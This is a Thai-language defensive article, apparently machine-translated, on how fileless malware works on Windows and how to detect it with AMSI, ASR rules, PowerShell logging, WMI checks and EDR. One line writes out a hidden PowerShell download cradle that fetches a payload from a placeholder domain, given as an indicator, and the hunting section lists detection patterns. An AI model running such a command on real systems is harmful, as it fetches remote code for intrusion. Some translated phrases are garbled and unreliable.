ตรวจจับมัลแวร์แบบไร้ไฟล์โดยใช้เทคนิคที่ดีที่สุด

  • มัลแวร์แบบไร้ไฟล์จะข้ามขั้นตอนการทำงานของดิสก์และทำงานในหน่วยความจำโดยใช้เครื่องมือที่ถูกต้องตามกฎหมาย เช่น PowerShell, WMI หรือมาโครของ Office
  • การตรวจจับที่มีประสิทธิภาพต้องอาศัยการวัดระยะทางของกระบวนการ การวิเคราะห์พฤติกรรม การตรวจสอบหน่วยความจำ และการใช้กฎ AMSI และ ASR
  • ระบบป้องกันควรผสานรวมการควบคุมพื้นฐานของ Windows 11, EDR แบบพฤติกรรม, นโยบายมาโคร/PowerShell ที่ดี และการค้นหาอย่างต่อเนื่อง
Daniel Terrasa

นาทีที่ 13

การตรวจจับมัลแวร์แบบไม่ใช้ไฟล์ใน Windows

El มัลแวร์ไร้ไฟล์ มันกลายเป็นปัญหาปวดหัวอย่างหนึ่งที่เพิ่มขึ้นเรื่อยๆ ในสภาพแวดล้อม Windows รุ่นใหม่ๆ รวมถึง Windows 11 ด้วย การโจมตีประเภทนี้หลีกเลี่ยงฮาร์ดไดรฟ์และอาศัยหน่วยความจำ สคริปต์ และไฟล์ไบนารีของระบบที่ถูกต้องตามกฎหมาย ทำให้โปรแกรมป้องกันไวรัสแบบใช้ลายเซ็นตรวจจับได้ยากมาก

เพื่อระบุตำแหน่งได้อย่างน่าเชื่อถือ การ "สแกนไวรัส" อย่างเดียวไม่เพียงพอจำเป็นต้องผสานรวมข้อมูลการวัดกระบวนการทำงานที่ครบถ้วน การวิเคราะห์พฤติกรรม การตรวจสอบหน่วยความจำ และการใช้เครื่องมือควบคุมของ Windows อย่างมีประสิทธิภาพ (PowerShell, WMI, รีจิสทรี, AMSI, กฎ ASR ฯลฯ) นอกจากนี้ ยังสำคัญที่จะต้องเข้าใจอย่างละเอียดว่ามัลแวร์แบบไร้ไฟล์คืออะไร มีรูปแบบใดบ้าง เข้าสู่ระบบได้อย่างไร คงอยู่ในระบบได้อย่างไร และทิ้งร่องรอยอะไรไว้บ้าง แม้ว่าทุกอย่างจะเกิดขึ้นภายใน RAM ก็ตาม

มัลแวร์แบบไร้ไฟล์คืออะไร และทำไมมันถึงสร้างปัญหามากมายใน Windows 11?

เมื่อเราพูดถึง มัลแวร์ไร้ไฟล์ เราอ้างถึง รหัสที่เป็นอันตราย โปรแกรมนี้ไม่จำเป็นต้องสร้างไฟล์ปฏิบัติการใหม่ที่มองเห็นได้ในระบบไฟล์เพื่อทำงาน โดยทั่วไปแล้วมันจะแทรกตัวเองเข้าไปในกระบวนการที่มีอยู่แล้วและทำงานโดยตรงในหน่วยความจำ โดยใช้ประโยชน์จากเครื่องมือที่ได้รับการรับรองจาก Microsoft เช่น PowerShell, WMI, rundll32, mshta หรือ VBScript/JScriptวิธีนี้จะลดขนาดไฟล์และทำให้หลบเลี่ยงการตรวจจับจากโปรแกรมที่วิเคราะห์เฉพาะไฟล์ต้องสงสัยในดิสก์เท่านั้น

แม้แต่ เอกสารสำนักงาน, ไฟล์ PDF หรือลิงก์หลอกลวง ไฟล์ที่เรียกใช้คำสั่งและเชลล์โค้ดในหน่วยความจำจัดอยู่ในปรากฏการณ์นี้ เนื่องจากตัวไฟล์เองให้ข้อมูลที่เป็นประโยชน์สำหรับการวิเคราะห์น้อยมาก สิ่งที่คล้ายกันนี้เกิดขึ้นกับมาโครและกลไก DDE ใน Office: โค้ดที่เป็นอันตรายทำงานฝังอยู่ภายในกระบวนการที่ถูกต้องตามกฎหมาย เช่น Word หรือ Excel โดยไม่มีไฟล์ปฏิบัติการที่ผิดปกติปรากฏบนดิสก์

ผู้โจมตีรวมกัน การวิศวกรรมทางสังคมและการแสวงหาประโยชน์อีเมลที่มีไฟล์แนบ ลิงก์ไปยังเว็บไซต์ที่ถูกบุกรุก หรือมาโครที่ดูเหมือนไม่มีพิษภัย อาจกระตุ้นให้เกิดกระบวนการที่สคริปต์ดาวน์โหลดและเรียกใช้เพย์โหลดในหน่วยความจำหลัก (RAM) และลบหลักฐานให้เร็วที่สุด เป้าหมายสูงสุดอาจแตกต่างกันไป ตั้งแต่การขโมยข้อมูลประจำตัวและข้อมูลสำคัญ ไปจนถึงการติดตั้งแรนซัมแวร์ การสอดแนมเป็นเวลานาน (APT) หรือการเคลื่อนที่ไปมาในเครือข่ายโดยไม่ถูกตรวจพบ

มัลแวร์ที่ไม่มีไฟล์

ประเภทของมัลแวร์แบบไร้ไฟล์ จำแนกตามร่องรอยที่มันทิ้งไว้ในระบบ

เพื่อหลีกเลี่ยงความสับสนในแนวคิดต่างๆ จึงเป็นประโยชน์ที่จะทำเช่นนี้ จำแนกภัยคุกคามตามระดับการโต้ตอบกับระบบไฟล์สิ่งนี้ช่วยชี้แจงว่าอะไรยังคงอยู่ รหัสถูกจัดเก็บไว้ที่ใด และหลักฐานทางนิติวิทยาศาสตร์ใดที่มันทิ้งไว้

ประเภทที่ 1: ไม่มีกิจกรรมไฟล์

ในที่นี้เรากำลังพูดถึง "การเขียนโค้ดแบบไร้ไฟล์" อย่างแท้จริง: โค้ดจะไม่เขียนอะไรลงดิสก์เลย ตัวอย่างคลาสสิกคือการใช้งาน... ช่องโหว่ของเครือข่าย เช่น การโจมตี SMB (เช่น การโจมตี EternalBlue) เพื่อโหลดแบ็กดอร์เข้าไปในหน่วยความจำเคอร์เนล เช่น DoublePulsar การโจมตีทั้งหมดเกิดขึ้นใน RAM และไม่มีไฟล์ใหม่ปรากฏในระบบไฟล์

ภัยคุกคามที่อยู่ในประเภทเดียวกันนี้ ติดเชื้อเฟิร์มแวร์ การโจมตีเหล่านี้สามารถแทรกซึมเข้ามาได้จาก BIOS/UEFI, การ์ดเครือข่าย, ดิสก์ หรือแม้แต่ระบบย่อยของ CPU พวกมันยังคงอยู่แม้จะรีบูตเครื่องหรือติดตั้งระบบปฏิบัติการใหม่ และมีโซลูชันด้านความปลอดภัยเพียงไม่กี่ตัวเท่านั้นที่ตรวจสอบในระดับนี้ได้อย่างแท้จริง การโจมตีเหล่านี้เกิดขึ้นไม่บ่อยนักและมีความซับซ้อนสูง แต่การรวมกันของ... การลอบเร้นและความอดทน นี่จึงทำให้พวกมันอันตรายเป็นพิเศษ

ประเภทที่ II: กิจกรรมการเก็บถาวรทางอ้อม

ในกลุ่มนี้ มัลแวร์จะไม่สร้างไฟล์ปฏิบัติการของตัวเอง แต่จะใช้คอนเทนเนอร์ที่ระบบจัดการ ซึ่งจะถูกจัดเก็บไว้ในดิสก์ในที่สุด ตัวอย่างเช่น แบ็กดอร์ที่จัดเก็บไฟล์ปฏิบัติการของตัวเอง คำสั่งหรือสคริปต์ PowerShell ภายในที่เก็บข้อมูล WMI หรือรีจิสทรีของ Windows และจะถูกเรียกใช้งานโดยใช้ตัวกรองเหตุการณ์หรือคีย์ Run/RunOnce ที่เก็บข้อมูล WMI และรีจิสทรีนั้นจัดเก็บอยู่บนดิสก์ในรูปแบบฐานข้อมูลที่ถูกต้องตามกฎหมาย ซึ่งยากต่อการล้างข้อมูลโดยไม่แก้ไขระบบ

จากมุมมองในทางปฏิบัติแล้ว พวกมันก็ถือว่าเป็นระบบไร้ไฟล์เช่นกัน เนื่องจากมีคอนเทนเนอร์ (WMI, รีจิสทรี, เซクターบูต ฯลฯ) นี่ไม่ใช่ไฟล์ปฏิบัติการแบบคลาสสิก และต้องทำความสะอาดอย่างพิถีพิถัน ผลลัพธ์สุดท้ายคือสีที่ติดทนนานอย่างนุ่มนวล โดยแทบไม่มีร่องรอย "แบบดั้งเดิม" เหลืออยู่เลย

ประเภท III: ไฮบริดที่ขึ้นอยู่กับไฟล์

ในกรณีนี้ ตรรกะที่เป็นอันตรายจะอาศัยอยู่ในหน่วยความจำ ในรีจิสทรี หรือใน WMI แต่จำเป็นต้องมีบางอย่างเพิ่มเติม ทริกเกอร์แบบไฟล์ตัวอย่างที่เห็นได้ชัดคือ Kovter: มันจะลงทะเบียนคำสั่งเชลล์สำหรับนามสกุลไฟล์ที่หายาก และเมื่อเปิดไฟล์ดังกล่าว สคริปต์ขนาดเล็กจะถูกเรียกใช้งาน ซึ่งผ่านทาง mshta.exe หรือไบนารีอื่นๆ จะสร้างเพย์โหลดที่เป็นอันตรายขึ้นมาใหม่จากรีจิสทรี

ไฟล์ "ล่อเป้า" เหล่านี้ไม่มีข้อมูลสำคัญที่สามารถวิเคราะห์ได้โดยตรง ข้อมูลสำคัญจริงๆ อยู่ในคอนเทนเนอร์ต่างๆ เช่น... การลงทะเบียนหรือ WMIด้วยเหตุนี้ พวกมันจึงมักถูกจัดกลุ่มอยู่ภายใต้หมวดหมู่ภัยคุกคามแบบไร้ไฟล์ แม้ว่าในทางเทคนิคแล้วพวกมันจะขึ้นอยู่กับไฟล์บนดิสก์อย่างน้อยหนึ่งไฟล์ก็ตาม

เวกเตอร์อินพุตและตำแหน่งที่ซ่อนไฟล์แบบไร้ไฟล์ไว้

การสร้างแผนที่นั้นมีความสำคัญอย่างยิ่งต่อการปรับปรุงประสิทธิภาพการตรวจจับ มัลแวร์เข้ามาจากที่ใด และมันแฝงตัวอยู่ในกระบวนการหรือวัตถุใดบ้าง?มุมมองนี้ช่วยให้สามารถใช้งานการควบคุมเฉพาะเจาะจงและจัดลำดับความสำคัญของข้อมูลการวัดระยะทางที่สำคัญอย่างแท้จริงได้

ในด้านของ การหาประโยชน์ เราพบภัยคุกคามหลักสองประเภท ประเภทแรกคือการโจมตีผ่านไฟล์ ซึ่งเอกสารสำนักงาน ไฟล์ PDF ไฟล์ปฏิบัติการ ไฟล์ LNK หรือเนื้อหา Flash/Java รุ่นเก่า จะใช้ประโยชน์จากช่องโหว่ของเบราว์เซอร์หรือแอปพลิเคชันที่ประมวลผล โดยการโหลดเชลล์โค้ดเข้าไปในหน่วยความจำ (กรณีทั่วไปคือการโจมตีด้วยสแปมจำนวนมากโดยใช้ Word ที่มีมาโคร) ประเภทที่สองคือการโจมตีผ่านเครือข่าย เช่น... WannaCryซึ่งแพ็กเกจที่เป็นอันตรายจะใช้ประโยชน์จากช่องโหว่ในบริการ (SMB, RDP เป็นต้น) และสามารถเรียกใช้งานได้โดยตรงในพื้นที่ผู้ใช้หรือเคอร์เนล โดยไม่ต้องเขียนไฟล์ใหม่ลงดิสก์เลย

นอกจากนี้ยังมีเวกเตอร์ของ ฮาร์ดแวร์และเฟิร์มแวร์ นี่ไม่ใช่เรื่องเล็กน้อย อุปกรณ์ที่มีเฟิร์มแวร์ที่สามารถตั้งโปรแกรมใหม่ได้ (ฮาร์ดไดรฟ์ การ์ดเครือข่าย อุปกรณ์ต่อพ่วง USB ประเภท BadUSB) BIOS/UEFI หรือแม้แต่มินิไฮเปอร์ไวเซอร์ที่เป็นอันตราย สามารถแทรกโค้ดที่ทำงานอยู่ใต้ระบบปฏิบัติการได้ เทคนิคเหล่านี้จัดอยู่ในประเภทที่ 1 อย่างชัดเจน: คงอยู่นอกระบบปฏิบัติการ และเป็นเรื่องยากอย่างยิ่งที่จะตรวจสอบและกำจัดพวกมัน

ในส่วนของการเรียกใช้งานและการฉีดข้อมูล ผู้โจมตีใช้ประโยชน์จากทั้งสองอย่าง ไฟล์ "ปกติ" เช่น สคริปต์ในหน่วยความจำไฟล์ปฏิบัติการ (EXE/DLL/LNK) หรือโปรแกรมที่ตั้งเวลาไว้ สามารถแทรกกระบวนการที่ถูกต้องตามกฎหมายได้ แม้แต่เซกเตอร์บูต (MBR/EFI) ก็สามารถถูกดัดแปลงโดยตระกูลมัลแวร์ เช่น Petya เพื่อควบคุมระบบตั้งแต่เริ่มต้น โดยข้ามระบบไฟล์แบบดั้งเดิมไปได้

ที่แย่ไปกว่านั้น กลุ่มก่อการร้ายขั้นสูง (APT เช่น The Dukes/APT29) ได้แสดงให้เห็นถึงการรณรงค์ด้วย ช่องโหว่แบบไม่ต้องใช้ไฟล์ เช่น RegDuke หรือ POSHSPYซึ่งส่วนใหญ่แล้วจะจัดเก็บอยู่ในหน่วยความจำ, WMI และรีจิสทรี โดยผสมผสานเทคนิคต่างๆ เพื่อลดร่องรอยให้น้อยที่สุด

มัลแวร์ไร้ไฟล์

ห่วงโซ่การโจมตีแบบไร้ไฟล์: ขั้นตอนและสัญญาณที่ต้องเฝ้าระวัง

แม้ว่าจะไม่ทิ้งไฟล์ปฏิบัติการที่มองเห็นได้ แต่การโจมตีแบบไร้ไฟล์ก็ยังคงเป็นไปตามรูปแบบเดิม ลำดับขั้นตอนที่ค่อนข้างชัดเจนการทำความเข้าใจสิ่งเหล่านี้เป็นกุญแจสำคัญในการทราบว่าเหตุการณ์และความสัมพันธ์ระหว่างกระบวนการใดบ้างที่ควรค่าแก่การติดตามตรวจสอบ

  1. ระยะของ การเข้าถึงครั้งแรก  โดยทั่วไปแล้ว การโจมตีแบบนี้มักอาศัยการหลอกลวงด้วยไฟล์แนบหรือลิงก์ เว็บไซต์ที่ถูกบุกรุก หรือข้อมูลประจำตัวที่ถูกขโมย มักพบว่าจุดเริ่มต้นคือเอกสาร Office ซึ่งเมื่อเปิดใช้งานเนื้อหาแบบแอคทีฟแล้ว จะเรียกใช้คำสั่ง PowerShell พร้อมพารามิเตอร์ที่น่าสงสัย (เช่น การข้ามการตรวจสอบนโยบายการดำเนินการ หน้าต่างที่ซ่อนอยู่ การดาวน์โหลดจากโดเมนที่ไม่คุ้นเคย เป็นต้น)
  2. ระยะคงอยู่นี่คือจุดที่ตัวกรองและการสมัครรับข้อมูล WMI, คีย์การทำงานอัตโนมัติในรีจิสทรี (Run, RunOnce, Winlogon), การใช้ Task Scheduler ในทางที่ผิด และการแก้ไขเซกเตอร์บูตเข้ามามีบทบาท มัลแวร์พยายามทำให้แน่ใจว่าหลังจากรีบูตหรือออกจากระบบ สภาพแวดล้อมที่เป็นอันตรายจะกลับเข้าสู่หน่วยความจำโดยไม่จำเป็นต้องนำไบนารีใหม่เข้ามาอีก
  3. ระยะของ การเคลื่อนที่ด้านข้างและการปีนป่ายเครื่องมือของระบบเอง (PowerShell Remoting, PsExec, WMI, RDP) อนุญาตให้เข้าถึงจากคอมพิวเตอร์เครื่องหนึ่งไปยังอีกเครื่องหนึ่งโดยใช้ข้อมูลประจำตัวที่ถูกขโมยมา ทั้งหมดนี้ทำ "นอกระบบ" โดยใช้ยูทิลิตี้ที่ถูกต้องตามกฎหมายซึ่งติดตั้งไว้แล้ว
  4. ขั้นตอนสุดท้าย: การถอนตัวและผลกระทบมัลแวร์สามารถเข้ารหัสข้อมูล (แรนซัมแวร์แบบไร้ไฟล์) ขโมยข้อมูลไปยังเซิร์ฟเวอร์ควบคุมและสั่งการ (C2) โดยใช้เบราว์เซอร์ Bitsadmin หรือ PowerShell หรือทำการเปลี่ยนแปลงระบบที่สำคัญได้ ตลอดวงจรชีวิตของมัลแวร์ ตัวบ่งชี้สำคัญจะซ่อนอยู่ในอาร์กิวเมนต์บรรทัดคำสั่ง โครงสร้างกระบวนการที่ผิดปกติ การเชื่อมต่อขาออกที่น่าสงสัย และการเรียกใช้ API แบบแทรกแซง

เทคนิคการโจมตีแบบไม่ใช้ไฟล์ที่พบได้ทั่วไป

เทคนิคการสร้างร่มแบบไร้แฟ้มครอบคลุมเทคนิคที่หลากหลาย แต่มีหลายเทคนิคที่ใช้ซ้ำแล้วซ้ำอีก การเข้าใจเทคนิคเหล่านี้จะช่วยในการวางแผน กฎการตรวจจับพฤติกรรมและแคมเปญการล่าที่มีประสิทธิภาพ.

หนึ่งในประเภทที่พบได้บ่อยที่สุดคือ มัลแวร์ที่ฝังอยู่ในหน่วยความจำผู้โจมตีจะโหลดเพย์โหลดเข้าไปในพื้นที่หน่วยความจำของกระบวนการที่เชื่อถือได้ (เช่น explorer.exe, svchost.exe หรือเบราว์เซอร์) และปล่อยให้มันรอคำสั่ง ในกรณีของรูทคิตและฮุกระดับเคอร์เนล ระดับการซ่อนเร้นจะยิ่งสูงขึ้น และโซลูชันจำนวนมากที่ตรวจสอบเฉพาะพื้นที่ผู้ใช้จะไม่สามารถมองเห็นอะไรได้เลย

กลยุทธ์อีกอย่างหนึ่งคือ การคงอยู่ของข้อมูลในรีจิสทรีของ Windowsโดยการจัดเก็บข้อมูลที่เข้ารหัสหรือสตริงที่ถูกทำให้คลุมเครือ จากนั้นจึงกู้คืนข้อมูลโดยใช้โปรแกรมเรียกใช้งานที่ถูกต้อง เช่น mshta, rundll32 หรือ wscript โปรแกรม "โหลดเดอร์" ขนาดเล็กนี้สามารถทำลายตัวเองได้ทันทีเมื่อเริ่มทำงาน ดังนั้นร่องรอยสำคัญจึงเหลืออยู่เพียงในคีย์รีจิสทรีและหน่วยความจำเท่านั้น

คุณยังได้เห็นสิ่งต่างๆ มากมายอีกด้วย การปลอมแปลงข้อมูลประจำตัวเมื่อชื่อผู้ใช้และรหัสผ่านถูกขโมยไปแล้ว ผู้โจมตีสามารถเปิดเชลล์ระยะไกล เรียกใช้สคริปต์โดยตรงในคอนโซลโดยไม่ต้องเขียนไฟล์ และฝังแบ็กดอร์แบบเงียบๆ ใน WMI หรือรีจิสทรีได้ ในสภาพแวดล้อมขององค์กร สิ่งนี้ทำให้สามารถดำเนินการสอดแนมได้เป็นเวลานานโดยมีอัตราการตรวจจับต่ำมาก หากไม่มีการตรวจสอบการใช้งานเครื่องมือบริหารจัดการอย่างเหมาะสม

ในส่วนที่มองเห็นได้ชัดเจนที่สุด แรนซัมแวร์แบบไร้ไฟล์ ระบบนี้สามารถเข้ารหัสข้อมูลและสื่อสารกับโครงสร้างพื้นฐาน C2 ได้ โดยทำงานเกือบทั้งหมดจากหน่วยความจำ บ่อยครั้ง สัญญาณแรกที่บ่งบอกว่ามีบางอย่างผิดปกติคือเมื่อไฟล์ถูกเข้ารหัสเรียบร้อยแล้ว เนื่องจากขั้นตอนก่อนหน้านี้ไม่ได้ทำให้เกิดการแจ้งเตือนด้านความปลอดภัยใดๆ

ความปลอดภัยจากมัลแวร์และการแฮ็กใน Windows 11 และ Windows 10: คู่มือฉบับสมบูรณ์

เหตุใดการ "บล็อกทุกอย่าง" ในบริษัทจึงไม่ได้ผล

อาจดูน่าดึงดูดใจที่จะเข้าเรื่องโดยตรงและ ปิดใช้งาน PowerShell บล็อกมาโคร หรือห้ามใช้ WMIปัญหาคือ คุณจะทำลายส่วนสำคัญของการดำเนินงานประจำวัน: PowerShell เป็นพื้นฐานสำหรับการบริหารจัดการในยุคปัจจุบัน, Office เป็นเครื่องมือทำงานพื้นฐาน และ WMI เป็นหัวใจสำคัญของการจัดการระบบ Windows

ถึงกระนั้น ความพยายามมากมายในการป้องกันการโจมตีแบบไร้ไฟล์ก็ยังคงอาศัยวิธีการนี้อยู่ เช่น การกำหนดรายการที่อนุญาตอย่างเข้มงวด การบล็อกมาโครแบบไม่วางแผน หรือเพียงแค่ปิดใช้งาน PowerShell.exe อย่างไรก็ตาม ผู้โจมตีได้ทำงานเกี่ยวกับเรื่องนี้มาสักระยะแล้ว เรียนรู้ที่จะหลบหลีกสิ่งกีดขวางเหล่านั้น: การใช้ PowerShell เวอร์ชันของคุณเอง การโหลดผ่าน DLL ด้วย rundll32 การบรรจุสคริปต์ไว้ภายในไฟล์ปฏิบัติการ การซ่อนโค้ดในรูปภาพ (สเตกาโนกราฟี) หรือการเรียกใช้ PowerShell ผ่านเครื่องมือตัวกลาง

อีกหนึ่งข้อผิดพลาดที่พบบ่อยคือการพึ่งพาแต่เพียงวิธีการแก้ปัญหาที่ พวกเขาตัดสินใจผ่านระบบคลาวด์หากเอเจนต์ปลายทางต้องสอบถามเซิร์ฟเวอร์ระยะไกลก่อนที่จะหยุดกิจกรรมที่น่าสงสัย การป้องกันแบบเรียลไทม์ก็จะด้อยประสิทธิภาพลง เนื่องจากจำเป็นต้องมีการเชื่อมต่อ และนอกจากนี้ยังทำให้เกิดความล่าช้าซึ่งอาจเป็นอันตรายถึงชีวิตได้ในการโจมตีที่รวดเร็ว (เช่น แรนซัมแวร์ โปรแกรมทำลายข้อมูล)

ในทางปฏิบัติ การป้องกันมัลแวร์แบบไร้ไฟล์จำเป็นต้องใช้การผสมผสานของหลายสิ่งหลายอย่าง ระบบส่งข้อมูลทางไกลในพื้นที่ที่ครบถ้วน และระบบตรวจจับพฤติกรรมบนอุปกรณ์ปลายทางเอง และเพื่อเพิ่มประสิทธิภาพยิ่งขึ้น ระบบวิเคราะห์ข้อมูลบนคลาวด์จะช่วยเสริม วิเคราะห์ความสัมพันธ์ และปรับปรุงข้อมูลเชิงลึก แต่การตัดสินใจที่จะหยุดกระบวนการหรือย้อนกลับการเปลี่ยนแปลงจะต้องสามารถทำได้ในระดับท้องถิ่น แม้กระทั่งในขณะออฟไลน์

วิธีตรวจจับมัลแวร์แบบไร้ไฟล์ใน Windows 11: ข้อมูลทางเทคนิคและพฤติกรรม

กลยุทธ์ที่นำไปสู่ชัยชนะนั้นเกี่ยวข้องกับ ตรวจสอบกระบวนการ หน่วยความจำ และพฤติกรรมไม่ใช่แค่ไฟล์เท่านั้น รูปแบบมัลแวร์มีความเสถียรมากกว่ารูปแบบต่างๆ ของมัลแวร์ชนิดเดียวกัน ดังนั้นวิธีการที่ใช้พฤติกรรมเป็นหลักจึงได้ผลดีที่สุดในการรับมือกับภัยคุกคามใหม่ๆ หรือภัยคุกคามที่ซับซ้อนขึ้น

ในระบบนิเวศของ Microsoft นั้น อินเทอร์เฟซการสแกนมัลแวร์ (AMSI) นี่คือส่วนประกอบสำคัญ มันช่วยให้คุณสามารถดักจับสคริปต์ใน PowerShell, VBScript หรือ JScript (และภาษาอื่นๆ ที่รองรับ) ได้ แม้ว่าสคริปต์เหล่านั้นจะถูกสร้างขึ้นแบบไดนามิกในหน่วยความจำก็ตาม ก่อนที่จะทำการเรียกใช้งาน เนื้อหาของสคริปต์จะถูกส่งไปยังเอนจิ้นป้องกันมัลแวร์ที่ลงทะเบียนไว้โดย AMSI ทำให้ตรวจจับสตริงที่น่าสงสัย การเข้ารหัสที่ไม่ถูกต้อง และพฤติกรรมมัลแวร์ทั่วไปได้ง่ายขึ้น

นอกจากนี้ การมีสิ่งนี้ก็เป็นสิ่งจำเป็นอย่างยิ่ง การตรวจสอบกระบวนการโดยละเอียดจุดเริ่มต้นและจุดสิ้นสุด, PID, กระบวนการหลักและกระบวนการย่อย, เส้นทางของไฟล์ปฏิบัติการ, แฮช, แผนผังกระบวนการทั้งหมด และที่สำคัญมากคือบรรทัดคำสั่งทั้งหมด ตัวบ่งชี้การโจมตีหลายอย่างถูกซ่อนอยู่หลังแฟล็กและอาร์กิวเมนต์ คำสั่งเช่น powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http://dominiotld/payload') พวกเขาไม่ควรถูกมองข้ามในสภาพแวดล้อมที่ค่อนข้างเป็นผู้ใหญ่

La การตรวจสอบหน่วยความจำ นี่เป็นอีกองค์ประกอบสำคัญ จำเป็นอย่างยิ่งที่จะต้องสามารถระบุเพย์โหลด PE ที่สะท้อนกลับมา พื้นที่หน่วยความจำที่ถูกทำเครื่องหมายว่าสามารถเรียกใช้งานได้ในกระบวนการที่ไม่ควรมีสิทธิ์นั้น และรูปแบบการฉีดทั่วไป (WriteProcessMemory, CreateRemoteThread เป็นต้น) โซลูชันสมัยใหม่เช่น EDR/Managed EDR (EMDR) และผลิตภัณฑ์เช่น Microsoft Defender for Endpoint หรือแพลตฟอร์มเช่น SentinelOne จะตรวจสอบการทำงานเหล่านี้ในระดับเคอร์เนลเพื่อแยกกิจกรรมที่เป็นอันตรายออกจากกิจกรรมที่ถูกต้อง

ทั้งหมดนี้ได้รับการเสริมด้วยการควบคุมเฉพาะต่างๆ เช่น การป้องกัน MBR/EFI เพื่อตรวจจับและย้อนกลับการเปลี่ยนแปลงแก้ไขเซกเตอร์บูต และมีความสามารถในการบันทึกบัฟเฟอร์หน่วยความจำที่เกี่ยวข้องกับการดำเนินการที่น่าสงสัย เพื่อให้ทีมตอบสนองสามารถสร้างลายเซ็นหรือกฎพฤติกรรมใหม่ได้

ขั้นตอนปฏิบัติใน Windows 11

นอกเหนือจากการมีโซลูชัน EDR ที่ทรงพลังแล้ว Windows 11 ยังมีคุณสมบัติอื่นๆ อีกมากมาย การควบคุมพื้นฐานที่มีประโยชน์มาก เพื่อทำให้มัลแวร์แบบไร้ไฟล์ทำงานได้ยากขึ้น และในขณะเดียวกันก็ช่วยเพิ่มประสิทธิภาพในการค้นหาภัยคุกคามด้วย

การป้องกัน

ใน PowerShell แนะนำให้เปิดใช้งาน การบันทึกข้อมูลบล็อกสคริปต์และการบันทึกข้อมูลโมดูลใช้โหมดจำกัดเมื่อทำได้ และตรวจสอบการใช้งาน ExecutionPolicy Bypass และหน้าต่างที่ซ่อนอยู่ วิธีนี้จะช่วยให้ได้ประวัติการเรียกใช้สคริปต์ แม้ว่าจะเป็นสคริปต์ที่สร้างขึ้นแบบไดนามิกก็ตาม และมีประโยชน์อย่างยิ่งในการตรวจจับการโจมตีหลังการบุกรุกด้วย PowerShell

ลา กฎการลดพื้นผิวการโจมตี (ASR) ระบบเหล่านี้ช่วยบล็อกไม่ให้ Office สร้างกระบวนการที่มุ่งเป้าไปที่ PowerShell, cmd, mshta หรือส่วนประกอบที่มีความเสี่ยงสูงอื่นๆ รวมถึงป้องกันการใช้ WMI หรือ PsExec ในทางที่ผิดเมื่อไม่จำเป็น เมื่อกำหนดค่าอย่างถูกต้อง ระบบเหล่านี้จะช่วยลดความเสี่ยงจากการโจมตีแบบไร้ไฟล์ในสภาพแวดล้อมสำนักงานได้อย่างมากโดยไม่รบกวนการดำเนินงานทางธุรกิจ

ในส่วนของเรื่องงานในออฟฟิศนั้น เป็นเรื่องสำคัญ ทำให้มาโครมีความแข็งแกร่งขึ้นเป้าหมายคือการปิดใช้งานฟังก์ชันเหล่านั้นโดยค่าเริ่มต้น อนุญาตเฉพาะมาโครที่ลงนามภายในเท่านั้น ใช้รายการความเชื่อถือที่เข้มงวด และตรวจสอบเวิร์กโฟลว์แบบ DDE เดิม จุดมุ่งหมายคือเพื่อให้แน่ใจว่าการเปิดเอกสารที่ได้รับทางอีเมลไม่ได้ให้สิทธิ์ในการเรียกใช้คำสั่งใดๆ บนระบบโดยไม่มีข้อจำกัด

ในด้านความต่อเนื่องนั้น เป็นสิ่งสำคัญอย่างยิ่ง ตรวจสอบ WMI, Registry และงานที่กำหนดไว้จำเป็นต้องมีการตรวจสอบการสมัครเข้าร่วมกิจกรรมอย่างสม่ำเสมอ root\Subscriptionชั้นเรียนต่างๆ เช่น __EventFilter, CommandLineEventConsumer y __FilterToConsumerBindingรวมถึงคีย์ Run/RunOnce และงานใหม่ที่เรียกใช้สคริปต์หรือไบนารี่ที่น่าสงสัย เครื่องมืออย่าง Sysmon มีประโยชน์มากในการสร้างเหตุการณ์ที่ครบถ้วน ในสภาพแวดล้อมขนาดใหญ่ การพึ่งพา EDR และ SIEM ที่ดีจึงเป็นเรื่องที่สมเหตุสมผล

เช่นเคย การซ่อมแซมและการทำให้แข็งตัว การรักษาความปลอดภัยของระบบปฏิบัติการ เว็บเบราว์เซอร์ โปรแกรม Office และบริการเครือข่าย เป็นแนวป้องกันขั้นพื้นฐาน การโจมตีแบบไร้ไฟล์จำนวนมากเริ่มต้นจากการใช้ประโยชน์จากช่องโหว่ที่รู้จักกันดี ซึ่งสามารถแก้ไขได้ด้วยการอัปเดตตามปกติ

การล่าสัตว์

การมุ่งเน้นการค้นหาไปที่เรื่องดังกล่าวจึงเป็นเรื่องที่สมเหตุสมผล รูปแบบการดำเนินการที่ผิดปกติกระบวนการในสำนักงานที่เรียกใช้ PowerShell หรือ mshta, บรรทัดคำสั่งที่มี downloadstring/downloadfile, สคริปต์ที่มีการปกปิดข้อมูลอย่างชัดเจน, การแทรกโค้ดแบบรีเฟล็กซ์ และการเชื่อมต่อขาออกไปยังโดเมนที่น่าสงสัยหรือ TLD ที่ผิดปกติ การตรวจสอบข้อมูลทั้งหมดนี้ร่วมกับข้อมูลชื่อเสียงและความถี่จะช่วยลดสัญญาณรบกวนและเปิดเผยแคมเปญลับๆ ได้

สุดท้ายนี้ เราไม่ควรลืมสิ่งนี้ การตระหนักถึงผู้ใช้และทีมงานด้านเทคนิคการสอนผู้ใช้ให้รู้จักวิธีระบุอีเมลฟิชชิ่ง ไฟล์แนบที่เป็นอันตราย ลิงก์ที่น่าสงสัย หรือพฤติกรรมแปลกๆ ของคอมพิวเตอร์ (เช่น หน้าต่างปิดเอง หรือกระบวนการคอนโซลทำงานผิดปกติ) ยังคงเป็นวิธีป้องกันที่มีประสิทธิภาพและคุ้มค่ามากในการป้องกันการโจมตีแบบไร้ไฟล์ขนาดใหญ่

ความเป็นจริงคือ มัลแวร์แบบไร้ไฟล์ไม่ใช่เรื่องแปลกอีกต่อไป แต่เป็นเทคนิคที่พบได้ทั่วไปในการโจมตีแบบเจาะจงเป้าหมายและแคมเปญขนาดใหญ่ที่ใช้สคริปต์ในทางที่ผิด การมุ่งเน้นไปที่... พฤติกรรมของกระบวนการ การใช้งานหน่วยความจำ และที่มาของการดำเนินการแต่ละครั้งการใช้ประโยชน์จาก AMSI, ระบบส่งข้อมูลทางไกลคุณภาพสูง, การควบคุมของ Windows 11 และแพลตฟอร์ม EDR ร่วมกับการวิเคราะห์พฤติกรรม และการเสริมด้วยนโยบายที่สมจริงสำหรับมาโคร, PowerShell และ WMI จะทำให้องค์กรใดๆ ก็ตามอยู่ในตำแหน่งที่ดีกว่ามากในการตรวจจับและหยุดยั้งเครือข่ายเหล่านี้ก่อนที่จะก่อให้เกิดภัยพิบัติ